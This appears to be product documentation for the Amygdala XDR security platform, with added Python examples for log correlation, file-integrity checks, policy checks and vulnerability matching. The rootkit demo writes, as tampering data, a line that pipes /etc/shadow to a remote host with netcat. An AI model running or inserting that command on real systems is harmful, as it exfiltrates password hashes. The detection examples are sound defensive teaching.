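The decoder-then-rules pipeline described above, as an added example that is not Amygdala XDR's decoders or ruleset: a decoder normalizes traditional syslog lines and extracts outcome, user and source address from OpenSSH authentication messages, a frequency rule fires when one source produces a threshold of failures inside a sliding window, and a correlation rule fires when a source already flagged for brute force then logs in successfully. The log lines, hostnames, addresses, thresholds and the assumed year are constructed for the example.

```python
"""sshd decoder plus a frequency rule and a cross-event correlation (added example, not Amygdala XDR code)."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import List, Optional

# Constructed sample log in the traditional syslog format that OpenSSH writes.
SAMPLE_LOG = """\
Mar  4 10:15:01 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 51122 ssh2
Mar  4 10:15:03 web01 sshd[2203]: Failed password for root from 203.0.113.5 port 51130 ssh2
Mar  4 10:15:04 web01 sshd[2205]: Failed password for invalid user test from 203.0.113.5 port 51140 ssh2
Mar  4 10:15:06 web01 sshd[2207]: Failed password for root from 203.0.113.5 port 51150 ssh2
Mar  4 10:15:09 web01 sshd[2209]: Failed password for root from 203.0.113.5 port 51160 ssh2
Mar  4 10:15:10 web01 sshd[2211]: Accepted password for root from 203.0.113.5 port 51170 ssh2
Mar  4 10:20:00 web01 sshd[2301]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar  4 10:40:00 web01 sshd[2302]: Failed password for alice from 198.51.100.7 port 40002 ssh2
Mar  4 10:40:01 web01 cron[99]: (root) CMD (run-parts /etc/cron.hourly)
"""

SYSLOG = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>[\w./-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$")
SSHD_AUTH = re.compile(
    r"^(?P<outcome>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[0-9a-fA-F.:]+) port \d+")


def decode(line: str) -> Optional[dict]:
    """Normalize one syslog line into fields; sshd auth messages gain outcome/user/src."""
    m = SYSLOG.match(line)
    if not m:
        return None
    event = m.groupdict()
    # Traditional syslog timestamps carry no year; the year is assumed here.
    event["ts"] = datetime.strptime(event["ts"], "%b %d %H:%M:%S").replace(year=2024)
    if event["prog"] == "sshd":
        auth = SSHD_AUTH.match(event["msg"])
        if auth:
            event.update(auth.groupdict())
            event["outcome"] = event["outcome"].lower()
    return event


def analyze(log_text: str, threshold: int = 4, window_s: int = 120) -> List[dict]:
    """Frequency rule: >= threshold failures from one source inside window_s seconds.
    Correlation: a successful login from a source already flagged for brute force."""
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        event = decode(line)
        if not event or "outcome" not in event:
            continue
        src, ts = event["src"], event["ts"]
        if event["outcome"] == "failed":
            window = failures[src]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_s:
                window.popleft()
            if len(window) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"rule": "ssh_bruteforce", "src": src, "count": len(window), "at": ts})
        elif event["outcome"] == "accepted" and src in flagged:
            alerts.append({"rule": "ssh_success_after_bruteforce", "src": src,
                           "user": event["user"], "at": ts})
    return alerts
```

The second source in the sample (198.51.100.7) fails twice but twenty minutes apart, so the sliding window evicts the first failure and no alert fires; the cron line is decoded but has no authentication fields and is ignored by both rules.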

Features

Centralized log management

With Amygdala XDR, you collect, normalize, and store log data from a wide range of sources in a central location, which makes it easier to manage and analyze security events across your entire environment.

Real-time analysis

Amygdala XDR's log data analysis engine analyzes log data in real time, so potential security threats are detected as they occur and you can respond to incidents more quickly and effectively.

Advanced correlation

Amygdala XDR uses correlation techniques to identify patterns of behavior that may indicate a security threat, including cross-referencing log data from different sources to detect complex attacks that span multiple systems or components.

Overall, Amygdala XDR's log data analysis module provides a powerful way to manage and analyze security events across your environment. By centralizing log data and applying correlation, you can better detect and respond to potential security threats and improve your overall security posture.

Technical Description

Amygdala XDR’s log data analysis module uses an event-driven architecture that is designed to collect, normalize, and analyze log data from a wide range of sources. At the front of that pipeline sit the data collectors.

Amygdala XDR supports a variety of data collectors for different log sources, including Amygdala XDR agents, Syslog, and APIs. These collectors are responsible for gathering log data and sending it to the Amygdala XDR manager, where decoding, rule evaluation, and indexing take place.

Technology-Supported, Protocols

Amygdala XDR’s log data analysis module supports a wide range of technologies and protocols for collecting and analyzing log data. Here are some of the key technologies and protocols that are used:

Syslog

Amygdala XDR can collect and analyze syslog data from a variety of sources, including Unix/Linux systems, network devices, and applications.

Amygdala XDR agents

Amygdala XDR provides Amygdala XDR agents for Windows, Linux, and macOS that can collect and forward log data to the Amygdala XDR manager for analysis.

APIs

Amygdala XDR supports a variety of APIs that can be used to collect log data from third-party applications and services.

Amygdala XDR Indexer

Amygdala XDR uses Amygdala XDR Indexer to store and search log data. Amygdala XDR Indexer provides a fast and scalable way to store and search large volumes of data.

Logstash

Amygdala XDR uses Logstash to collect, parse, and normalize log data from different sources. Logstash provides a flexible and extensible way to process log data before it is sent to Amygdala XDR Indexer.

Pattern matching

Amygdala XDR detects patterns of behavior that may indicate an attack, such as repeated login failures, unusual file access patterns, or suspicious network traffic.

Anomaly detection

Amygdala XDR detects anomalous behavior by comparing log data to established baselines or statistical models. This can help identify new and emerging threats that may not be covered by the traditional rules-based analysis.

Cross-referencing

Amygdala XDR can cross-reference log data from different sources to detect complex attacks that may span multiple systems or components.
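The decoder-and-rules pipeline described in the overview and the pattern matching and cross-referencing techniques above, as an added illustration rather than code from Amygdala XDR itself: a pre-decoder splits the syslog envelope, a program-specific decoder extracts normalized fields, atomic rules fire on the decoded action, and two correlation rules cover the two techniques (a frequency rule for repeated login failures from one source, and a rule that escalates when a successful login follows a brute-force alert from the same source). The sample log lines, rule identifiers, levels and thresholds are constructed for the example and are not the product's ruleset.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample syslog lines; not logs from any real system.
SAMPLE_LOGS = [
    "Mar 10 08:00:01 web01 sshd[2101]: Failed password for root from 203.0.113.5 port 50122 ssh2",
    "Mar 10 08:00:03 web01 sshd[2101]: Failed password for root from 203.0.113.5 port 50123 ssh2",
    "Mar 10 08:00:04 web01 sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 50124 ssh2",
    "Mar 10 08:00:06 web01 sshd[2101]: Failed password for root from 203.0.113.5 port 50125 ssh2",
    "Mar 10 08:00:09 web01 sshd[2101]: Failed password for root from 203.0.113.5 port 50126 ssh2",
    "Mar 10 08:00:12 web01 sshd[2102]: Accepted password for root from 203.0.113.5 port 50127 ssh2",
    "Mar 10 08:05:00 db01 sshd[3300]: Failed password for postgres from 198.51.100.9 port 41000 ssh2",
    "Mar 10 08:05:01 db01 CRON[3301]: (root) CMD (run-parts /etc/cron.hourly)",
]

# Pre-decoder: splits the syslog envelope (timestamp, host, program) from the message.
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[\w.-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")

# Decoders: per-program patterns that extract normalized fields (user, srcip, action).
DECODERS = {
    "sshd": [
        (re.compile(r"^Failed password for (?:invalid user )?(?P<user>\S+) from (?P<srcip>\S+) port (?P<srcport>\d+)"),
         "authentication_failed"),
        (re.compile(r"^Accepted (?:password|publickey) for (?P<user>\S+) from (?P<srcip>\S+) port (?P<srcport>\d+)"),
         "authentication_success"),
    ],
}

# Atomic rules fire on a decoded action; correlation rules fire on a history of prior matches.
# Ids, levels and descriptions are illustrative (assumption), not the product's ruleset.
RULES = [
    {"id": 5716, "level": 5, "description": "sshd: authentication failed", "action": "authentication_failed"},
    {"id": 5715, "level": 3, "description": "sshd: authentication success", "action": "authentication_success"},
]
CORRELATION_RULES = [
    # pattern matching: 5 matches of rule 5716 from the same srcip within 60 s
    {"id": 5720, "level": 10, "description": "sshd: brute-force attempt (5 failures within 60 s)",
     "if_matched": 5716, "frequency": 5, "timeframe": 60, "same_field": "srcip"},
    # cross-referencing: a success from an ip that triggered 5720 in the previous 300 s
    {"id": 5721, "level": 12, "description": "sshd: successful login after brute-force attempt",
     "if_matched": 5715, "after_rule": 5720, "timeframe": 300, "same_field": "srcip"},
]


def decode(line, year=2024):
    """Turn a raw line into a normalized event dict, or None if the envelope does not parse."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    event = {"timestamp": datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"),
             "hostname": m["host"], "program": m["prog"], "full_log": line}
    for pattern, action in DECODERS.get(m["prog"], []):
        sub = pattern.match(m["msg"])
        if sub:
            event.update(sub.groupdict())
            event["action"] = action
            break
    return event


class AlertEngine:
    def __init__(self):
        self.history = defaultdict(deque)   # (rule_id, key) -> timestamps of matches in the window
        self.fired = {}                      # (rule_id, key) -> time a correlation rule last fired

    def _alert(self, rule, event):
        return {"rule_id": rule["id"], "level": rule["level"], "description": rule["description"],
                "hostname": event["hostname"], "srcip": event.get("srcip"), "user": event.get("user"),
                "timestamp": event["timestamp"]}

    def process(self, event):
        alerts = []
        if event is None or "action" not in event:
            return alerts                      # no decoder matched: nothing to evaluate
        for rule in RULES:
            if rule["action"] != event["action"]:
                continue
            alerts.append(self._alert(rule, event))
            for corr in CORRELATION_RULES:
                if corr["if_matched"] != rule["id"]:
                    continue
                key = (corr["id"], event.get(corr["same_field"]))
                ts = event["timestamp"]
                if "frequency" in corr:
                    window = self.history[key]
                    window.append(ts)
                    while (ts - window[0]).total_seconds() > corr["timeframe"]:
                        window.popleft()      # drop matches that fell out of the timeframe
                    if len(window) >= corr["frequency"]:
                        alerts.append(self._alert(corr, event))
                        self.fired[key] = ts
                        window.clear()        # one alert per burst, not one per further failure
                elif "after_rule" in corr:
                    prior = self.fired.get((corr["after_rule"], event.get(corr["same_field"])))
                    if prior and (ts - prior).total_seconds() <= corr["timeframe"]:
                        alerts.append(self._alert(corr, event))
        return alerts


def analyze(lines):
    engine = AlertEngine()
    alerts = []
    for line in lines:
        alerts.extend(engine.process(decode(line)))
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOGS):
        print(f"rule {a['rule_id']} level {a['level']:>2} {a['srcip']!s:<14} {a['description']}")
```

Two details matter in practice. The frequency window is cleared once the correlation rule fires, so a sustained attack raises one level 10 alert instead of one per additional failure. And the success-after-brute-force rule keys on the same srcip field as the frequency rule; without that cross-reference the final login would be a level 3 event indistinguishable from a legitimate one.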

Module Dependency

Amygdala XDR Indexer

Amygdala XDR's log data analysis module relies on Amygdala XDR Indexer to store and search log data. Amygdala XDR Indexer is an open-source search and analytics engine that provides a fast and scalable way to store and search large volumes of data.

Logstash

Amygdala XDR uses Logstash to collect, parse, and normalize log data from different sources. Logstash is an open-source data processing pipeline that can be used to collect, process, and forward data.

Amygdala XDR Dashboard

Amygdala XDR's log data analysis module uses Amygdala XDR Dashboard to visualize log data and create custom dashboards and reports. Amygdala XDR Dashboard is an open-source data visualization solution that can be used to create interactive visualizations, such as charts, graphs, and tables.

OSSEC

Amygdala XDR's log data analysis module is based on the OSSEC project, which is an open-source host-based intrusion detection system. OSSEC provides a range of modules for analyzing system events and detecting potential security threats.

OpenSCAP

Amygdala XDR's log data analysis module uses OpenSCAP to perform vulnerability assessments and compliance checks on systems. OpenSCAP is an open-source implementation of the Security Content Automation Protocol (SCAP) and provides a set of tools and libraries for assessing system security.

Suricata

Amygdala XDR's log data analysis module integrates with Suricata, which is an open-source network intrusion detection system. Suricata provides a range of modules for detecting and preventing network-based attacks.

Dashboards

Rootkit Detection

Amygdala XDR’s rootkit detection module provides a way to detect and respond to rootkits, which are stealthy malware that can hide their presence on a compromised system. The module is designed to identify any unauthorized changes to the system that might indicate the presence of a rootkit. Amygdala XDR’s rootkit detection module uses a variety of techniques to detect rootkits, including file integrity monitoring, process monitoring, and kernel module monitoring. It can detect changes to critical system files, the creation of new processes, and the loading of unauthorized kernel modules.

In addition to detecting rootkits, Amygdala XDR’s rootkit detection module can also take actions to respond to rootkits, such as alerting security teams, blocking network traffic, or quarantining affected systems. The module is highly customizable and can be tailored to the specific needs of an organization. It can be configured to monitor specific files, directories, and processes, and to trigger alerts based on specific events or thresholds.

Features

Early Detection of Rootkits

Amygdala XDR's rootkit detection module detects rootkits early, before they have a chance to cause serious damage to a system or network. This can help organizations respond quickly and minimize the impact of an attack.

Multi-platform Support

Amygdala XDR's rootkit detection module supports a wide range of operating systems, including Windows, Linux, macOS, and others. This makes it a flexible and versatile solution for organizations with diverse IT environments.

File Integrity Monitoring

Amygdala XDR's rootkit detection module includes file integrity monitoring, which can detect changes to critical system files that may be indicative of a rootkit. This can help organizations identify suspicious activity and take action to investigate and remediate potential threats.

Technical Description

Amygdala XDR’s rootkit detection module uses a combination of techniques to detect and respond to rootkits, which are stealthy malware that can hide their presence on a compromised system. The module includes file integrity monitoring, which detects changes to critical system files that may be indicative of a rootkit. It also includes process monitoring, which detects the creation of new processes that may be associated with a rootkit. Additionally, kernel module monitoring is included to detect the loading of unauthorized kernel modules that may be associated with a rootkit.
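The file integrity part of the approach above, as an added example that is not the product's own scanner: a baseline of hashes and ownership/permission bits is taken, the tree is scanned again, and each difference is classified with a rootkit-oriented level (replaced system binary, file in a known hiding location, newly set setuid bit) rather than a flat "file changed" event. The directory layout, the suspicious-path list and the levels are constructed for the example. Process and kernel-module monitoring are deliberately left out because they need platform-specific interfaces; note also that a kernel-mode rootkit hooking the filesystem can lie to a user-space hasher like this one, which is exactly why the module pairs FIM with kernel-level checks.

```python
import hashlib
import os
import stat
import tempfile

# Constructed list of paths a rootcheck-style scan treats as suspicious if they appear;
# not the product's signature database.
SUSPICIOUS_PATHS = {"dev/.hidden", "tmp/.ICE-unix/.x"}


def fingerprint(path):
    """Content hash plus the metadata a rootkit has to change to drop in a trojaned binary."""
    st = os.lstat(path)
    digest = None
    if stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 16), b""):
                h.update(chunk)
        digest = h.hexdigest()
    return {"sha256": digest, "size": st.st_size, "mode": stat.S_IMODE(st.st_mode),
            "uid": st.st_uid, "gid": st.st_gid}


def snapshot(root):
    """Baseline: relative path -> fingerprint for every file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root).replace(os.sep, "/")] = fingerprint(full)
    return baseline


def diff(baseline, current):
    """Emit FIM events (added / deleted / modified) with the attributes that changed."""
    events = []
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            events.append({"type": "added", "path": path, "changed": []})
        elif path not in current:
            events.append({"type": "deleted", "path": path, "changed": []})
        else:
            changed = [k for k in baseline[path] if baseline[path][k] != current[path][k]]
            if changed:
                events.append({"type": "modified", "path": path, "changed": changed})
    return events


def classify(events, current):
    """Assign an alert level: rootkit-like indicators score higher than generic changes."""
    for ev in events:
        level = 7                                        # generic integrity change
        fp = current.get(ev["path"], {})
        if ev["path"] in SUSPICIOUS_PATHS:
            level = 12                                   # known hiding location
        elif (ev["type"] == "modified" and "sha256" in ev["changed"]
              and ev["path"].startswith(("bin/", "sbin/", "usr/bin/"))):
            level = 12                                   # system binary content replaced
        elif "mode" in ev["changed"] and fp.get("mode", 0) & (stat.S_ISUID | stat.S_ISGID):
            level = 10                                   # file gained setuid/setgid
        ev["level"] = level
    return events


def demo():
    """Build a tiny filesystem in a temp dir, baseline it, tamper with it, and scan again."""
    with tempfile.TemporaryDirectory() as root:
        for d in ("bin", "dev", "etc"):
            os.makedirs(os.path.join(root, d))
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"#!/bin/sh\nexec /bin/ls.real \"$@\"\n")
        with open(os.path.join(root, "etc", "passwd"), "wb") as f:
            f.write(b"root:x:0:0:root:/root:/bin/sh\n")
        with open(os.path.join(root, "etc", "motd"), "wb") as f:
            f.write(b"welcome\n")
        baseline = snapshot(root)

        # Tampering: trojan the binary, drop a hidden file, set setuid on a file, remove motd.
        with open(os.path.join(root, "bin", "ls"), "ab") as f:
            f.write(b"cat /etc/shadow | nc 203.0.113.9 4444\n")
        with open(os.path.join(root, "dev", ".hidden"), "wb") as f:
            f.write(b"backdoor\n")
        os.chmod(os.path.join(root, "etc", "passwd"), 0o4644)
        os.remove(os.path.join(root, "etc", "motd"))

        current = snapshot(root)
        return classify(diff(baseline, current), current)


if __name__ == "__main__":
    for ev in demo():
        print(f"level {ev['level']:>2} {ev['type']:<8} {ev['path']} {ev['changed']}")
```

The baseline should be stored somewhere the monitored host cannot rewrite it (on the manager, as the module's architecture implies), since a rootkit with root can otherwise re-baseline its own changes.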

Amygdala XDR’s rootkit detection module leverages system-level APIs and kernel modules to monitor system activity and detect signs of a rootkit. It uses the Open Source Security Information Management (OSSIM) framework for event correlation and analysis, allowing it to generate alerts and notifications based on specific criteria.

Technology-Supported, Protocols

Amygdala XDR’s rootkit detection module does not rely on any specific network protocols, as it primarily focuses on monitoring system-level activity rather than network traffic. It monitors system files, processes, and kernel modules to detect signs of a rootkit, and can generate alerts and notifications based on specific criteria. While the module can be integrated with a wide range of SIEM solutions and other security tools, it does not use any specific protocols of its own.

Amygdala XDR’s rootkit detection module uses a variety of system-level APIs and kernel modules to monitor system activity and detect signs of a rootkit. It leverages a range of open-source technologies, including the Open-Source Security Information Management (OSSIM) framework for event correlation and analysis.

Module Dependency

Amygdala XDR’s rootkit detection module uses a variety of open-source libraries and projects to help identify and respond to rootkits. Some of the key libraries and projects that the module depends on include:

System calls and kernel modules

Amygdala XDR's rootkit detection module uses a range of system calls and kernel modules to monitor system activity and detect signs of a rootkit. These low-level tools provide a granular view of system behavior, enabling the module to identify even subtle indications of a rootkit.

Open-Source Security Information Management (OSSIM)

Amygdala XDR's rootkit detection module is built on the OSSIM framework, which provides a scalable, centralized platform for managing security information. OSSIM enables the module to collect and correlate data from multiple sources, enhancing its ability to detect rootkits.

File Integrity Monitoring (FIM) tools

Amygdala XDR's rootkit detection module uses FIM tools to monitor changes to critical system files and directories. By comparing the current state of a file to a known baseline, the module can detect if a file has been modified or replaced by a rootkit.

Machine learning algorithms

Amygdala XDR's rootkit detection module incorporates machine learning algorithms to enhance its detection capabilities. These algorithms use historical data to identify patterns and anomalies that may indicate the presence of a rootkit.

Dashboards

Configuration Assessment

Amygdala XDR’s configuration assessment module enables your organization to monitor the configuration of its systems and applications for compliance with security policies, best practices, and regulatory requirements. The module allows organizations to define their own policies or use pre-defined templates to assess configurations and detect changes that may represent security risks. Configuration assessment covers a wide range of items, including OS-level settings, application settings, file permissions, and registry keys.

Amygdala XDR’s configuration assessment module provides real-time alerts and notifications when a configuration change violates a policy. This allows organizations to respond quickly and prevent security incidents before they can cause harm. The module also provides detailed reports on configuration assessments, making it easy to demonstrate compliance with internal and external policies and standards.

Benefits & Modules

Automated configuration assessment

Amygdala XDR's configuration assessment module enables organizations to automate the process of assessing the configuration of their systems and applications. This reduces the manual effort required to ensure compliance with security policies and best practices and provides real-time alerts when configuration changes violate policies.

Customizable policies

Amygdala XDR's configuration assessment module allows organizations to define their policies or use pre-defined templates to assess configurations. This enables organizations to tailor the assessments to their specific security policies and compliance requirements.

Real-time alerts

The module provides real-time alerts and notifications when a configuration change violates a policy. This allows organizations to respond quickly to potential security incidents and take action to prevent harm.

Comprehensive reports

Amygdala XDR's configuration assessment module provides detailed reports on configuration assessments, making it easy to demonstrate compliance with internal and external policies and standards.

Integration with other security tools

Amygdala XDR's configuration assessment module can be integrated with other security tools, such as intrusion detection systems, to provide a more comprehensive view of security threats.

Technical Description

Amygdala XDR’s Configuration Assessment module allows for the assessment and analysis of the configuration of a system or application to ensure compliance with security policies and best practices. This module is implemented through the use of Amygdala XDR rules and plugins that are specifically designed to detect and report on configuration issues or misconfigurations. These rules and plugins are regularly updated to ensure they are up-to-date with the latest security policies and best practices.

The Configuration Assessment module includes a set of pre-defined templates that can be used to quickly assess and analyze the configuration of common applications and services. Users can also create custom templates for more specialized configurations. The Configuration Assessment module also provides a dashboard that allows users to monitor and track the compliance status of their systems over time, and to quickly identify and address any configuration issues or misconfigurations that may be present.

Overall, the Configuration Assessment module is an important tool for ensuring the security and compliance of systems and applications, and for identifying and addressing potential security issues before they can be exploited by attackers.
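How a policy of checks is evaluated against a host and how a change is turned into an alert, as an added example and not the product's template format or engine: a policy is a list of checks, each check is a set of rules combined with an all/any/none condition, and a check that passed on the previous run but fails now is what the real-time alert is raised on. The sshd_config contents, file mode and check titles are constructed; the checks are in the spirit of a CIS-style SSH benchmark but are not quoted from one.

```python
import copy
import re
import stat

# Constructed stand-in for a host's files (content plus mode); not read from a real system.
FAKE_FS = {
    "/etc/ssh/sshd_config": {
        "mode": 0o644,
        "text": "# PermitRootLogin yes\n"        # commented out: must not satisfy any check
                "PermitRootLogin no\n"
                "PasswordAuthentication yes\n"
                "MaxAuthTries 6\n"
                "X11Forwarding no\n",
    },
}

# Illustrative policy (assumption): rule tuples are (type, path, argument).
POLICY = {
    "id": "ssh_hardening_demo",
    "checks": [
        {"id": 1, "title": "Root login over SSH is disabled", "condition": "all",
         "rules": [("regex", "/etc/ssh/sshd_config", r"^\s*PermitRootLogin\s+no\b")]},
        {"id": 2, "title": "Password authentication is disabled", "condition": "all",
         "rules": [("regex", "/etc/ssh/sshd_config", r"^\s*PasswordAuthentication\s+no\b")]},
        {"id": 3, "title": "MaxAuthTries is 4 or less", "condition": "all",
         "rules": [("regex", "/etc/ssh/sshd_config", r"^\s*MaxAuthTries\s+[1-4]\b")]},
        {"id": 4, "title": "sshd_config is not world-accessible", "condition": "none",
         "rules": [("mode_any", "/etc/ssh/sshd_config", stat.S_IROTH | stat.S_IWOTH)]},
        {"id": 5, "title": "Legacy SSH protocol 1 is not enabled", "condition": "none",
         "rules": [("regex", "/etc/ssh/sshd_config", r"^\s*Protocol\s+.*\b1\b")]},
    ],
}


def evaluate_rule(rule, fs):
    kind, path, arg = rule
    entry = fs.get(path)
    if entry is None:
        return False                 # a missing file never satisfies a rule (so "none" passes)
    if kind == "regex":
        # anchored at line start so commented-out directives do not count
        return any(re.search(arg, line) for line in entry["text"].splitlines())
    if kind == "mode_any":
        return bool(entry["mode"] & arg)
    raise ValueError(f"unknown rule type {kind}")


def evaluate_check(check, fs):
    results = [evaluate_rule(r, fs) for r in check["rules"]]
    cond = check["condition"]
    ok = {"all": all(results), "any": any(results), "none": not any(results)}[cond]
    return "passed" if ok else "failed"


def run_policy(policy, fs):
    outcome = {c["id"]: evaluate_check(c, fs) for c in policy["checks"]}
    passed = sum(1 for v in outcome.values() if v == "passed")
    return {"policy": policy["id"], "results": outcome, "score": round(100 * passed / len(outcome))}


def regressions(previous, current):
    """Checks that passed last run and fail now: the events worth alerting on in real time."""
    return sorted(cid for cid, r in current["results"].items()
                  if r == "failed" and previous["results"].get(cid) == "passed")


def demo():
    """Simulate a config drift: password auth was off on the previous scan, on now."""
    before = copy.deepcopy(FAKE_FS)
    before["/etc/ssh/sshd_config"]["text"] = before["/etc/ssh/sshd_config"]["text"].replace(
        "PasswordAuthentication yes", "PasswordAuthentication no")
    return regressions(run_policy(POLICY, before), run_policy(POLICY, FAKE_FS))


if __name__ == "__main__":
    report = run_policy(POLICY, FAKE_FS)
    for check in POLICY["checks"]:
        print(f"{report['results'][check['id']]:<7} {check['title']}")
    print("score:", report["score"], "regressed checks:", demo())
```

The two points a practitioner checks in a policy engine are visible here: directives in comments must not satisfy a check (the anchored regex), and a check with condition "none" must pass when the file is absent, otherwise every host without the file fails spuriously.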

Technology-Supported, Protocols

Amygdala XDR’s Configuration Assessment module uses several technologies and protocols to perform its functions.

Firstly, Amygdala XDR uses OSSEC, which is an open-source host-based intrusion detection system, to collect and analyze data related to system configuration. Amygdala XDR also leverages the Extensible Configuration Checklist Description Format (XCCDF) and the Open Vulnerability and Assessment Language (OVAL), the SCAP component specifications, to define the configuration policies and vulnerability checks that are used to evaluate system configurations.

In addition, Amygdala XDR’s Configuration Assessment module integrates with the Security Content Automation Protocol (SCAP) to support the exchange of configuration and vulnerability information between different systems and applications. Finally, the Amygdala XDR Configuration Assessment module uses a range of other technologies and tools, such as the Unix shell and Python scripting language, to implement its functions and modules.

Module Dependency

Amygdala XDR’s Configuration Assessment module is built on several open-source libraries and projects, including the following.

As mentioned earlier, Amygdala XDR uses OSSEC as the underlying host-based intrusion detection system to collect and analyze system configuration data.

Dashboards

Vulnerability Detection

Amygdala XDR’s Vulnerability Detection is a module that can identify known software vulnerabilities in the environment, both at the operating system and application levels. It leverages information from various sources, such as the National Vulnerability Database (NVD), to detect and alert to vulnerabilities affecting the environment. The module can also integrate with patch management systems to enable automated remediation of vulnerabilities.

Amygdala XDR’s Vulnerability Detection works by scanning the systems in the environment for known vulnerabilities based on the information available in various databases. It can scan for vulnerabilities in the operating system, web applications, and databases, among other areas. The module can also provide information on the severity of the vulnerability and any available remediation steps.

Features

Comprehensive vulnerability scanning

Amygdala XDR's Vulnerability Detection scans systems in the environment for known vulnerabilities in various areas, including the operating system, web applications, and databases.

Integration with external vulnerability databases

The module leverages information from external sources, such as the National Vulnerability Database (NVD), to detect and alert on vulnerabilities affecting the environment.

Remediation automation

Amygdala XDR's Vulnerability Detection integrates with patch management systems to enable automated remediation of vulnerabilities.

Severity assessment

The module can provide information on the severity of the vulnerability, allowing organizations to prioritize remediation efforts.

Real-time alerts

Vulnerability Detection generates real-time alerts when a vulnerability is detected, allowing organizations to take immediate action to address the issue.

Compliance support

The module helps organizations meet compliance requirements by identifying and remediating known vulnerabilities in their environment.

Technical Description

Amygdala XDR’s Vulnerability Detection module allows users to scan their systems and detect potential vulnerabilities in their infrastructure. The module utilizes multiple vulnerability databases and scanners, including the Open Vulnerability Assessment System (OpenVAS) and the National Vulnerability Database (NVD), to identify security weaknesses.

Amygdala XDR’s Vulnerability Detection module uses the Common Vulnerability Scoring System (CVSS) to rate the severity of vulnerabilities and prioritize which vulnerabilities to address first. The module integrates with various security tools and systems, including security information and event management (SIEM) systems, to provide a comprehensive view of security issues across an organization’s infrastructure.

The module also includes automatic vulnerability detection and reporting, as well as the ability to schedule vulnerability scans at regular intervals. Users can customize the module to meet their specific security needs, including creating custom rules and policies for vulnerability detection and remediation.

The vulnerability detection module uses a variety of technologies, including vulnerability databases, network scanning tools, and analysis engines, to identify and assess vulnerabilities across an organization’s infrastructure. It also relies on protocols and data formats such as the Simple Network Management Protocol (SNMP) and the Extensible Markup Language (XML) to collect and analyze data from a variety of sources.
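The matching and prioritization steps described above, as an added example rather than the product's own scanner: an installed-package inventory is compared against a feed of advisories with affected-version ranges, each hit is scored with its CVSS value, and the findings come back ordered for remediation with the fixed version attached. The inventory, the advisory entries and their identifiers (DEMO-nnnn) are constructed for the example and are not real packages or real CVEs; the severity bands are the CVSS v3.x qualitative ratings.

```python
import re
from operator import itemgetter

# Constructed inventory and advisory feed; fictitious package names and advisory ids.
INVENTORY = [
    {"name": "demo-ssl",    "version": "1.1.1j"},
    {"name": "demo-httpd",  "version": "2.4.49"},
    {"name": "demo-zlib",   "version": "1.2.13"},
    {"name": "demo-kernel", "version": "5.10.0-8"},
]

FEED = [
    {"id": "DEMO-0001", "package": "demo-ssl",    "affected": [("<", "1.1.1k")],                   "fixed": "1.1.1k",   "cvss": 7.5},
    {"id": "DEMO-0002", "package": "demo-httpd",  "affected": [(">=", "2.4.49"), ("<", "2.4.51")], "fixed": "2.4.51",   "cvss": 9.8},
    {"id": "DEMO-0003", "package": "demo-zlib",   "affected": [("<", "1.2.12")],                   "fixed": "1.2.12",   "cvss": 8.2},
    {"id": "DEMO-0004", "package": "demo-kernel", "affected": [("<", "5.10.0-9")],                 "fixed": "5.10.0-9", "cvss": 5.5},
]


def version_key(v):
    """Split '1.1.1k' or '5.10.0-8' into comparable tokens: digits numerically, letters lexically.
    Simplification: real package managers (dpkg epochs and '~', rpm release tags) need the
    native comparator, or '1.2.13' style strings get compared as text and 13 sorts before 9."""
    return tuple((0, int(t)) if t.isdigit() else (1, t) for t in re.findall(r"\d+|[A-Za-z]+", v))


OPS = {"<": lambda a, b: a < b, "<=": lambda a, b: a <= b,
       ">": lambda a, b: a > b, ">=": lambda a, b: a >= b, "==": lambda a, b: a == b}


def is_affected(version, constraints):
    key = version_key(version)
    return all(OPS[op](key, version_key(bound)) for op, bound in constraints)


def severity(cvss):
    """CVSS v3.x qualitative severity bands."""
    if cvss == 0:
        return "None"
    if cvss < 4.0:
        return "Low"
    if cvss < 7.0:
        return "Medium"
    if cvss < 9.0:
        return "High"
    return "Critical"


def scan(inventory, feed):
    """Return findings for installed packages inside an advisory's affected range, worst first."""
    installed = {p["name"]: p["version"] for p in inventory}
    findings = []
    for adv in feed:
        version = installed.get(adv["package"])
        if version is None or not is_affected(version, adv["affected"]):
            continue
        findings.append({"id": adv["id"], "package": adv["package"], "installed": version,
                         "fixed": adv["fixed"], "cvss": adv["cvss"], "severity": severity(adv["cvss"])})
    return sorted(findings, key=itemgetter("cvss"), reverse=True)


if __name__ == "__main__":
    for f in scan(INVENTORY, FEED):
        print(f"{f['severity']:<8} {f['cvss']:>4} {f['id']} {f['package']} {f['installed']} -> upgrade to {f['fixed']}")
```

Version comparison is where real scanners get false positives and negatives: a distribution that backports a fix keeps the upstream version string, so a feed keyed on upstream versions alone will flag a patched package. That is why the module consults several data sources rather than one.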

Technology-Supported, Protocols

Amygdala XDR’s Vulnerability Detection module uses a combination of technologies and protocols to perform its functions. These include:

Vulnerability data sources

Amygdala XDR uses different sources of vulnerability data, such as the National Vulnerability Database (NVD), the Common Vulnerabilities and Exposures (CVE) list, and other publicly available vulnerability data sources.

Vulnerability scanners

